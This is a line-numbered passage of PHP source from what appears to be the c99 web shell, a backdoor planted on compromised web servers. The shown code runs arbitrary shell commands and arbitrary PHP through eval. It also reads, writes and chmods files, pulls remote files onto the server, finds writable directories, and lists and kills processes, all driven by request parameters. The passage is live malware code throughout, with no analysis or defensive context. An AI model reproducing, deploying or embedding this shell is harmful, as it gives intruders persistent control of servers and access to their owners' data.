2155       $cmdline .= " ".$v;
2156     }
2157     $tmp = realpath(".");
2158     chdir($d);
2159     $ret = myshellexec($cmdline);
2160     chdir($tmp);
2161     if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
2162     $ret = str_replace("\r\n","\n",$ret);
2163     $ret = explode("\n",$ret);
2164     if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
2165     foreach($sess_data["cut"] as $k=>$v) {
2166       if (in_array($v,$ret)) {fs_rmobj($v);}
2167       unset($sess_data["cut"][$k]);
2168     }
2169     c99_sess_put($sess_data);
2170     if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
2171     $act = "ls";
2172   }
2173   elseif ($actpastebuff) {
2174     $psterr = "";
2175     foreach($sess_data["copy"] as $k=>$v) {
2176       $to = $d.basename($v);
2177       if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
2178       if ($copy_unset) {unset($sess_data["copy"][$k]);}
2179     }
2180     foreach($sess_data["cut"] as $k=>$v) {
2181       $to = $d.basename($v);
2182       if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
2183       unset($sess_data["cut"][$k]);
2184     }
2185     c99_sess_put($sess_data);
2186     if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
2187     $act = "ls";
2188   }
2189 }
2190 if ($act == "cmd") {
2191   @chdir($chdir);
2192   if (!empty($submit)) {
2193     echo "<div class=barheader>.: Result of Command Execution :.</div>";
2194     $olddir = realpath(".");
2195     @chdir($d);
2196     $ret = myshellexec($cmd);
2197     $ret = convert_cyr_string($ret,"d","w");
2198     if ($cmd_txt) {
2199       $rows = count(explode("\r\n",$ret))+1;
2200       if ($rows < 10) {$rows = 10; }
2201       if ($msie) { $cols = 113; }
2202       else { $cols = 117;}
2203       //echo "<textarea cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>";
2204       echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
2205     }
2206     else {echo $ret."<br>";}
2207     @chdir($olddir);
2208   }
2209   else {
2210     echo "<b>Command Execution</b>";
2211     if (empty($cmd_txt)) {$cmd_txt = TRUE;}
2212   }
2213 }
2214 if ($act == "ls") {
2215   if (count($ls_arr) > 0) { $list = $ls_arr; }
2216   else {
2217     $list = array();
2218     if ($h = @opendir($d)) {
2219       while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
2220       closedir($h);
2221     }
2222   }
2223   if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
2224   else {
2225     $objects = array();
2226     $vd = "f"; //Viewing mode
2227     if ($vd == "f") {
2228       $objects["head"] = array();
2229       $objects["folders"] = array();
2230       $objects["links"] = array();
2231       $objects["files"] = array();
2232       foreach ($list as $v) {
2233         $o = basename($v);
2234         $row = array();
2235         if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
2236         elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
2237         elseif (is_dir($v)) {
2238           if (is_link($v)) {$type = "LINK";}
2239           else {$type = "DIR";}
2240           $row[] = $v;
2241           $row[] = $type;
2242         }
2243         elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
2244         $row[] = filemtime($v);
2245         if (!$win) {
2246           $ow = posix_getpwuid(fileowner($v));
2247           $gr = posix_getgrgid(filegroup($v));
2248           $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
2249         }
2250         $row[] = fileperms($v);
2251         if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
2252         elseif (is_link($v)) {$objects["links"][] = $row;}
2253         elseif (is_dir($v)) {$objects["folders"][] = $row;}
2254         elseif (is_file($v)) {$objects["files"][] = $row;}
2255         $i++;
2256       }
2257       $row = array();
2258       $row[] = "<b>Name</b>";
2259       $row[] = "<b>Size</b>";
2260       $row[] = "<b>Date Modified</b>";
2261       if (!$win) {$row[] = "<b>Owner/Group</b>";}
2262       $row[] = "<b>Perms</b>";
2263       $row[] = "<b>Action</b>";
2264       $parsesort = parsesort($sort);
2265       $sort = $parsesort[0].$parsesort[1];
2266       $k = $parsesort[0];
2267       if ($parsesort[1] != "a") {$parsesort[1] = "d";}
2268       $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
2269       $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
2270       $row[$k] .= $y;
2271       for($i=0;$i<count($row)-1;$i++) {
2272         if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
2273       }
2274       $v = $parsesort[0];
2275       usort($objects["folders"], "tabsort");
2276       usort($objects["links"], "tabsort");
2277       usort($objects["files"], "tabsort");
2278       if ($parsesort[1] == "d") {
2279         $objects["folders"] = array_reverse($objects["folders"]);
2280         $objects["files"] = array_reverse($objects["files"]);
2281       }
2282       $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
2283       $tab = array();
2284       $tab["cols"] = array($row);
2285       $tab["head"] = array();
2286       $tab["folders"] = array();
2287       $tab["links"] = array();
2288       $tab["files"] = array();
2289       $i = 0;
2290       foreach ($objects as $a) {
2291         $v = $a[0];
2292         $o = basename($v);
2293         $dir = dirname($v);
2294         if ($disp_fullpath) {$disppath = $v;}
2295         else {$disppath = $o;}
2296         $disppath = str2mini($disppath,60);
2297         if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
2298         elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
2299         foreach ($regxp_highlight as $r) {
2300           if (ereg($r[0],$o)) {
2301             if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
2302             else {
2303               $r[1] = round($r[1]);
2304               $isdir = is_dir($v);
2305               if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
2306                 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
2307                 $disppath = $r[2].$disppath.$r[3];
2308                 if ($r[4]) {break;}
2309               }
2310             }
2311           }
2312         }
2313         $uo = urlencode($o);
2314         $ud = urlencode($dir);
2315         $uv = urlencode($v);
2316         $row = array();
2317         if ($o == ".") {
2318           $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
2319           $row[] = "CURDIR";
2320         }
2321         elseif ($o == "..") {
2322           $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
2323           $row[] = "UPDIR";
2324         }
2325         elseif (is_dir($v)) {
2326           if (is_link($v)) {
2327             $disppath .= " => ".readlink($v);
2328             $type = "LINK";
2329             $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
2330           }
2331           else {
2332             $type = "DIR";
2333             $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
2334           }
2335           $row[] = $type;
2336         }
2337         elseif(is_file($v)) {
2338           $ext = explode(".",$o);
2339           $c = count($ext)-1;
2340           $ext = $ext[$c];
2341           $ext = strtolower($ext);
2342           $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
2343           $row[] = view_size($a[1]);
2344         }
2345         $row[] = date("d.m.Y H:i:s",$a[2]);
2346         if (!$win) {$row[] = $a[3];}
2347         $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
2348         if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
2349         else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
2350         if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
2351         else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
2352         if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
2353         elseif (is_link($v)) {$tab["links"][] = $row;}
2354         elseif (is_dir($v)) {$tab["folders"][] = $row;}
2355         elseif (is_file($v)) {$tab["files"][] = $row;}
2356         $i++;
2357       }
2358     }
2359     // Compiling table
2360     $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
2361     echo "<div class=barheader>.: ";
2362     if (!empty($fx_infohead)) { echo $fx_infohead; }
2363     else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
2364     echo " :.</div>\n";
2365     echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
2366          "<table class=explorer>";
2367     foreach($table as $row) {
2368       echo "<tr>";
2369       foreach($row as $v) {echo "<td>".$v."</td>";}
2370       echo "</tr>\r\n";
2371     }
2372     echo "</table>".
2373          "<script>".
2374          "function ls_setcheckboxall(status) {".
2375          " var id = 1; var num = ".(count($table)-2).";".
2376          " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
2377          "}".
2378          "function ls_reverse_all() {".
2379          " var id = 1; var num = ".(count($table)-2).";".
2380          " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
2381          "}".
2382          "</script>".
2383          "<div align=\"right\">".
2384          "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
2385          "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
2386     if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
2387       echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
2388     }
2389     echo "<select name=act><option value=\"".$act."\">With selected:</option>";
2390     echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
2391     echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
2392     if ($usefsbuff) {
2393       echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
2394       echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
2395       echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
2396     }
2397     echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
2398     echo "</form>";
2399   }
2400 }
2401 if ($act == "tools") //Define Yourself
2402 {
2403 
2404 }
2405 if ($act == "phpfsys") {
2406   echo "<div align=left>";
2407   $fsfunc = $phpfsysfunc;
2408   if ($fsfunc=="copy") {
2409     if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
2410     else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
2411   }
2412   elseif ($fsfunc=="rename") {
2413     if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
2414     else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
2415   }
2416   elseif ($fsfunc=="chmod") {
2417     if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
2418     else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
2419   }
2420   elseif ($fsfunc=="read") {
2421     $hasil = @file_get_contents($arg1);
2422     echo "<b>Filename:</b> $arg1<br>";
2423     echo "<textarea cols=150 rows=20>";
2424     echo $hasil;
2425     echo "</textarea>\n";
2426   }
2427   elseif ($fsfunc=="write") {
2428     if(@file_put_contents($d.$arg1,$arg2)) {
2429       echo "<b>Saved!</b> ".$d.$arg1;
2430     }
2431     else { echo "<div class=fxerrmsg>Couldn't write to $arg1!</div>"; }
2432   }
2433   elseif ($fsfunc=="downloadbin") {
2434     $handle = fopen($arg1, "rb");
2435     $contents = '';
2436     while (!feof($handle)) {
2437       $contents .= fread($handle, 8192);
2438     }
2439     $r = @fopen($d.$arg2,'w');
2440     if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
2441     else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
2442     fclose($r);
2443     fclose($handle);
2444   }
2445   elseif ($fsfunc=="download") {
2446     $text = implode('', file($arg1));
2447     if ($text) {
2448       $r = @fopen($d.$arg2,'w');
2449       if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
2450       else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
2451       fclose($r);
2452     }
2453     else { echo "<div class=fxerrmsg>Couldn't download from $arg1!</div>";}
2454   }
2455   elseif ($fsfunc=='mkdir') {
2456     $thedir = $d.$arg1;
2457     if ($thedir != $d) {
2458       if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
2459       elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
2460       else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
2461     }
2462     else { echo "Couldn't create current dir:<b> $thedir</b>"; }
2463   }
2464   elseif ($fsfunc=='fwritabledir') {
2465     function recurse_dir($dir,$max_dir) {
2466       global $dir_count;
2467       $dir_count++;
2468       if( $cdir = @dir($dir) ) {
2469         while( $entry = $cdir-> read() ) {
2470           if( $entry != '.' && $entry != '..' ) {
2471             if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
2472              if ($dir_count > $max_dir) { return; }
2473               echo "[".$dir_count."] ".$dir.$entry."\n";
2474               recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
2475             }
2476           }
2477         }
2478         $cdir->close();
2479       }
2480     }
2481     if (!$arg1) { $arg1 = $d; }
2482     if (!$arg2) { $arg2 = 10; }
2483     echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
2484     echo "<pre>";
2485     recurse_dir($arg1,$arg2);
2486     echo "</pre>";
2487     $total = $dir_count - 1;
2488     echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
2489   }
2490   else {
2491     if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
2492     else {
2493       if ($hasil = $fsfunc($arg1)) {
2494         echo "<b>Result of $fsfunc $arg1:</b><br>";
2495         if (!is_array($hasil)) { echo "$hasil\n"; }
2496         else {
2497           echo "<pre>";
2498           foreach ($hasil as $v) { echo $v."\n"; }
2499           echo "</pre>";
2500         }
2501       }
2502       else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
2503     }
2504   }
2505   echo "</div>\n";
2506 }
2507 if ($act == "processes") {
2508   echo "<div class=barheader>.: Processes :.</div>";
2509   if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); }
2510   else { $handler = "tasklist"; }
2511   $ret = myshellexec($handler);
2512   if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
2513   else {
2514     if (empty($processes_sort)) {$processes_sort = $sort_default;}
2515     $parsesort = parsesort($processes_sort);
2516     if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2517     $k = $parsesort[0];
2518     if ($parsesort[1] != "a") {
2519       $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
2520     }
2521     else {
2522       $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
2523     }
2524     $ret = htmlspecialchars($ret);
2525     if (!$win) {
2526       if ($pid) {
2527         if (is_null($sig)) {$sig = 9;}
2528         echo "Sending signal ".$sig." to #".$pid."... ";
2529         if (posix_kill($pid,$sig)) {echo "OK.";}
2530         else {echo "ERROR.";}
2531       }
2532       while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
2533       $stack = explode("\n",$ret);
2534       $head = explode(" ",$stack[0]);
2535       unset($stack[0]);
2536       for($i=0;$i<count($head);$i++) {
2537         if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
2538       }
2539       $prcs = array();
2540       foreach ($stack as $line) {
2541         if (!empty($line)) {
2542           echo "<tr>";
2543           $line = explode(" ",$line);
2544           $line[10] = join(" ",array_slice($line,10));
2545           $line = array_slice($line,0,11);
2546           if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
2547           $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2548           $prcs[] = $line;
2549           echo "</tr>";
2550         }
2551       }
2552     }
2553     //For Windows - Fixed By Centrino Core 2 Duo
2554     else {
2555       while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
2556       while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);}
2557       $ret = convert_cyr_string($ret,"d","w");
2558       $stack = explode("\n",$ret);
2559       unset($stack[0],$stack[2]);
2560       $stack = array_values($stack);
2561       $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
2562       $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
2563       $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
2564       $head = explode(" ",$stack[0]);
2565       $stack = array_slice($stack,1);
2566       $head = array_values($head);
2567       if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
2568       else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
2569       if ($k > count($head)) {$k = count($head)-1;}
2570       for($i=0;$i<count($head);$i++) {
2571         if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
2572       }
2573       $prcs = array();
2574       unset($stack[0]);
2575       foreach ($stack as $line) {
2576         if (!empty($line)) {
2577           $line = explode(" ",$line);
2578           $line[4] = str_replace(".","",$line[4]);
2579           $line[4] = intval($line[4]) * 1024;
2580           unset($line[5]);
2581           $prcs[] = $line;
2582         }
2583       }
2584     }
2585     $head[$k] = "<b>".$head[$k]."</b>".$y;
2586     $v = $processes_sort[0];
2587     usort($prcs,"tabsort");
2588     if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
2589     $tab = array();
2590     $tab[] = $head;
2591     $tab = array_merge($tab,$prcs);
2592     echo "<table class=explorer>";
2593     foreach($tab as $i=>$k) {
2594       echo "<tr>";
2595       foreach($k as $j=>$v) {
2596         if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
2597         echo "<td>".$v."</td>";
2598       }
2599       echo "</tr>";
2600     }
2601     echo "</table>";
2602   }
2603 }
2604 if ($act == "eval") {
2605   if (!empty($eval)) {
2606     echo "Result of execution this PHP-code:<br>";
2607     $tmp = ob_get_contents();
2608     $olddir = realpath(".");
2609     @chdir($d);
2610     if ($tmp) {
2611       ob_clean();
2612       eval($eval);
2613       $ret = ob_get_contents();
2614       $ret = convert_cyr_string($ret,"d","w");
2615       ob_clean();
2616       echo $tmp;
2617       if ($eval_txt) {
2618         $rows = count(explode("\r\n",$ret))+1;
2619         if ($rows < 10) {$rows = 10;}
2620         echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2621       }
2622       else {echo $ret."<br>";}
2623     }
2624     else {
2625       if ($eval_txt) {
2626         echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
2627         eval($eval);
2628         echo "</textarea>";
2629       }
2630       else {echo $ret;}
2631     }
2632     @chdir($olddir);
2633   }
2634   else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
2635   echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
2636 }
2637 if ($act == "f") {
2638   echo "<div align=left>";
2639   if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
2640     if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
2641     else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
2642   }
2643   else {
2644     $r = @file_get_contents($d.$f);
2645     $ext = explode(".",$f);
2646     $c = count($ext)-1;
2647     $ext = $ext[$c];
2648     $ext = strtolower($ext);
2649     $rft = "";
2650     foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
2651     if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
2652     if (empty($ft)) {$ft = $rft;}
2653     $arr = array(
2654         array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
2655         array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
2656         array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
2657         array("Code","code"),
2658         array("Session","phpsess"),
2659         array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
2660         array("SDB","sdb"),
2661         array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
2662         array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
2663         array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
2664         array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
2665         array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
2666     );
2667     echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
2668     foreach($arr as $t) {
2669       if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
2670       elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
2671       else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
2672       echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
2673     }
2674     echo "<hr size=\"1\" noshade>";
2675     if ($ft == "info") {
2676       echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
2677       if (!$win) {
2678         echo "<tr><td><b>Owner/Group</b></td><td> ";
2679         $ow = posix_getpwuid(fileowner($d.$f));
2680         $gr = posix_getgrgid(filegroup($d.$f));
2681         echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2682       }
2683       echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
2684       $fi = fopen($d.$f,"rb");
2685       if ($fi) {
2686         if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
2687         else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
2688         $n = 0;
2689         $a0 = "00000000<br>";
2690         $a1 = "";
2691         $a2 = "";
2692         for ($i=0; $i<strlen($str); $i++) {
2693           $a1 .= sprintf("%02X",ord($str[$i]))." ";
2694           switch (ord($str[$i])) {
2695             case 0:  $a2 .= "<font>0</font>"; break;
2696             case 32:
2697             case 10:
2698             case 13: $a2 .= "&nbsp;"; break;
2699             default: $a2 .= htmlspecialchars($str[$i]);
2700           }
2701           $n++;
2702           if ($n == $hexdump_rows) {
2703             $n = 0;
2704             if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2705             $a1 .= "<br>";
2706             $a2 .= "<br>";
2707           }
2708         }
2709         echo "<table border=1 bgcolor=#666666>".
2710              "<tr><td bgcolor=#666666>".$a0."</td>".
2711              "<td bgcolor=#000000>".$a1."</td>".
2712              "<td bgcolor=#000000>".$a2."</td>".
2713              "</tr></table><br>";
2714       }
2715       $encoded = "";
2716       if ($base64 == 1) {
2717         echo "<b>Base64 Encode</b><br>";
2718         $encoded = base64_encode(file_get_contents($d.$f));
2719       }
2720       elseif($base64 == 2) {
2721         echo "<b>Base64 Encode + Chunk</b><br>";
2722         $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2723       }
2724       elseif($base64 == 3) {
2725         echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
2726         $encoded = base64_encode(file_get_contents($d.$f));
2727         $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2728       }
2729       elseif($base64 == 4) {
2730         $text = file_get_contents($d.$f);
2731         $encoded = base64_decode($text);
2732         echo "<b>Base64 Decode";
2733     if (base64_encode($encoded) != $text) {echo " (failed)";}
2734     echo "</b><br>";
2735    }
2736    if (!empty($encoded))
2737    {
2738     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
2739    }
2740    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
2741         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
2742         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
2743         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
2744         <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
2745         <P>";
2746   }
2747   elseif ($ft == "html") {
2748    if ($white) {@ob_clean();}
2749    echo $r;
